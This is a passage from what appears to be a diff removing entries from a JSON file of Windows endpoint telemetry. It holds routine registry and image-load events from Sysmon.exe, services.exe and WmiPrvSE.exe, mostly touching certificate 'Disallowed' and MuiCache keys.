"CRLs", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "browcli.dll", - "image_path": "C:\\Windows\\System32\\browcli.dll", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570848240000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570848860000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "image_load", - "image_name": "FWPUCLNT.DLL", - "image_path": "C:\\Windows\\System32\\FWPUCLNT.DLL", - "pid": 3808, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883570848390000, - "unique_pid": "{42FC7E13-B2BB-5C05-0000-0010E9ED0200}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 568, - "process_name": "services.exe", - "process_path": "C:\\WINDOWS\\system32\\services.exe", - "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E", - "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000_Classes\\Local Settings\\MuiCache\\1\\52C64B7E\\LanguageList", - "registry_value": "LanguageList", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-B292-5C05-0000-0010A5AF0000}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570849020000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": 